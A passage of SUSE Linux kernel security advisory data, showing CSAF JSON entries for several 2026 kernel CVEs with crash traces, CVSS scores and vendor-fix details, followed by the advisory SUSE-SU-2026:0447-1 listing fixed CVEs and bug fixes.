"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
SUSE-SU-2026:0447-1
Vulnerability from csaf_suse - Published: 2026-02-11 14:05 - Updated: 2026-02-11 14:05Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 15 SP7 kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).
- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).
- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).
- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).
- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).
- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).
- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68215: ice: fix PTP cleanup on driver removal in error path (bsc#1255226).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68363: bpf: Check skb->transport_header is set in bpf_skb_check_mtu (bsc#1255552).
- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).
- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).
- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix 'UBSAN: shift-out-of-bounds error' (bsc#1256760).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).
- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: ctxfi: Fix potential OOB access in audio mixer handling (stable-fixes).
- ALSA: scarlett2: Fix buffer overflow in config retrieval (git-fixes).
- ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (git-fixes).
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- ALSA: usb: Increase volume range that triggers a warning (git-fixes).
- ASoC: amd: yc: Add quirk for Honor MagicBook X16 2025 (stable-fixes).
- ASoC: codecs: wsa881x: Drop unused version readout (stable-fixes).
- ASoC: codecs: wsa881x: fix unnecessary initialisation (git-fixes).
- ASoC: codecs: wsa883x: fix unnecessary initialisation (git-fixes).
- ASoC: codecs: wsa884x: fix codec initialisation (git-fixes).
- ASoC: fsl_sai: Add missing registers to cache default (stable-fixes).
- ASoC: fsl: imx-card: Do not force slot width to sample width (git-fixes).
- ASoC: Intel: sof_es8336: fix headphone GPIO logic inversion (git-fixes).
- ASoC: tlv320adcx140: fix null pointer (git-fixes).
- ASoC: tlv320adcx140: fix word length (git-fixes).
- ata: libata: Add cpr_log to ata_dev_print_features() early return (git-fixes).
- Bluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work (git-fixes).
- Bluetooth: MGMT: Fix memory leak in set_ssp_complete (git-fixes).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bs-upload-kernel: Fix cve branch uploads.
- btrfs: do not strictly require dirty metadata threshold for metadata writepages (stable-fixes).
- can: ctucanfd: fix SSP_SRC in cases when bit-rate is higher than 1 MBit (git-fixes).
- can: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: etas_es58x: allow partial RX URB allocation to succeed (git-fixes).
- can: gs_usb: gs_usb_receive_bulk_callback(): fix error message (git-fixes).
